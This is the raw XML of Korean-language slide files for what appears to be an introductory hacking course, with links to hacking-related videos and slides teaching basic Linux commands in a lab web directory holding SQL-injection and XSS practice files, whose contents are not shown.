
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp"/>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287" r:id="rId4"/>
    <p:sldId id="373" r:id="rId5"/>
    <p:sldId id="374" r:id="rId6"/>
    <p:sldId id="375" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="281" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="355" r:id="rId22"/>
    <p:sldId id="291" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="292" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="294"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315" r:id="rId42"/>
    <p:sldId id="316" r:id="rId43"/>
    <p:sldId id="317" r:id="rId44"/>
    <p:sldId id="311" r:id="rId45"/>
    <p:sldId id="312" r:id="rId46"/>
    <p:sldId id="313" r:id="rId47"/>
    <p:sldId id="314" r:id="rId48"/>
    <p:sldId id="318" r:id="rId49"/>
    <p:sldId id="319" r:id="rId50"/>
    <p:sldId id="320" r:id="rId51"/>
    <p:sldId id="321" r:id="rId52"/>
    <p:sldId id="322" r:id="rId53"/>
    <p:sldId id="323" r:id="rId54"/>
    <p:sldId id="324" r:id="rId55"/>
    <p:sldId id="326" r:id="rId56"/>
    <p:sldId id="327" r:id="rId57"/>
    <p:sldId id="328" r:id="rId58"/>
    <p:sldId id="329"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3" r:id="rId73"/>
    <p:sldId id="344" r:id="rId74"/>
    <p:sldId id="345" r:id="rId75"/>
    <p:sldId id="346" r:id="rId76"/>
    <p:sldId id="347" r:id="rId77"/>
    <p:sldId id="348" r:id="rId78"/>
    <p:sldId id="349" r:id="rId79"/>
    <p:sldId id="350" r:id="rId80"/>
    <p:sldId id="351" r:id="rId81"/>
    <p:sldId id="352" r:id="rId82"/>
    <p:sldId id="353" r:id="rId83"/>
    <p:sldId id="354" r:id="rId84"/>
    <p:sldId id="356" r:id="rId85"/>
    <p:sldId id="357" r:id="rId86"/>
    <p:sldId id="358" r:id="rId87"/>
    <p:sldId id="359" r:id="rId88"/>
    <p:sldId id="360" r:id="rId89"/>
    <p:sldId id="361" r:id="rId90"/>
    <p:sldId id="362" r:id="rId91"/>
    <p:sldId id="363" r:id="rId92"/>
    <p:sldId id="364" r:id="rId93"/>
    <p:sldId id="367" r:id="rId94"/>
    <p:sldId id="368" r:id="rId95"/>
    <p:sldId id="370" r:id="rId96"/>
    <p:sldId id="372" r:id="rId97"/>
    <p:sldId id="369" r:id="rId98"/>
    <p:sldId id="371" r:id="rId99"/>
    <p:sldId id="268" r:id="rId100"/>
    <p:sldId id="365" r:id="rId101"/>
    <p:sldId id="366" r:id="rId102"/>
    <p:sldId id="296" r:id="rId103"/>
    <p:sldId id="325" r:id="rId104"/>
    <p:sldId id="290" r:id="rId10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D18E"/>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7" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="138"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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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2021-02-19</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50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20mysql%20exploit.mp4" TargetMode="Externa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hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20Smarthome%20Hacking%20In%20Real%20World.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20&#51648;&#47280;&#52286;&#44592;%20&#53356;&#47001;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#50612;&#45208;&#45768;&#47672;&#49828;%20IS%20&#44277;&#44201;.mp4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.mp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5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51453;&#44592;&#51204;&#50640;%20&#50508;&#50500;&#50556;%20&#54624;%20&#50669;&#49324;,%20&#48120;&#46300;&#50920;&#51060;%20&#54644;&#51204;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#51088;&#47561;&#45684;&#49828;%5d%20&#51064;&#53552;&#45367;%20&#51096;%20&#50504;%20&#46104;&#45716;%20&#21271;,%20&#50612;&#46523;&#44172;%20&#49464;&#44228;%20&#44275;&#44275;%20&#54644;&#53433;&#54624;&#44620;%20_%20YTN.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#54644;&#53433;%20vs%20&#54644;&#53433;%20(Hacker%20Vs%20Hacker)%20%5b&#45224;&#44284;&#48513;17%5d.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.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93.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.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18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide89.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.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99.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.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57.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide31.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide51.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId16"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slide" Target="slide29.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide74.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide37.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide35.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6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2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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide41.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gif"/><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47.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.gif"/><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4.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.pn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bmp"/></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 Target="slide2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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.gif"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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3.bmp"/><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76.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><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 Target="slide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide55.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 Target="slide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.gif"/><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 Target="slide20.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88.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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20.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 Target="slide20.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62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.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103.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.bmp"/><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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.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8.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 Target="slide20.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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.bmp"/><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115.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.bmp"/><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120.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.bmp"/><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126.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide77.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.pn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131.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.bmp"/></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 Target="slide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.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3.bmp"/><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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.bmp"/><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8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 Target="slide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide85.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85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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slide" Target="slide84.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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slide" Target="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 Target="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91.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide90.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9.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4.bmp"/><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6.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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89.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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slide" Target="slide1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89.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12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide89.xml"/><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slide" Target="slide93.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97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><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 Target="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229438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2755841180"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1325564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4532244">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file"/>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65058">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8877580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476580265"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2067339" y="2014453"/>
          <a:ext cx="8213698" cy="3275070"/>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gridCol w="747423">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3549310020"/>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file"/>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지식</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유머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전쟁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유머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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4300036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10690734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80C7EC-4675-437A-81A0-1A0D6E97021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681754A-2693-4C28-A299-E5432694E657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>󰏮</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22885459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155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5532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6415155" y="1690688"/>
            <a:ext cx="3977200" cy="4971502"/>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실습실 사진</a:t>
            </a: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52096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472169459"/>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작업중인 디렉토리 정보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grep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echo</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디렉토리 생성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최근 업데이트 일자를 현재 시간으로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head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앞부분을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뒷부분을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27768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6743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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</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example]#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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/example</a:t>
              </a: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example]#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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>webhack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>]#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6F81AA95-3EE1-4610-BE09-C37E81D839A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89202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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</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example]# ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</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example]# ls -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>12</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxrw-rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 303  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 index.html</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439  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>--r-- 1 root </a:t>
              </a:r>
              <a:r>
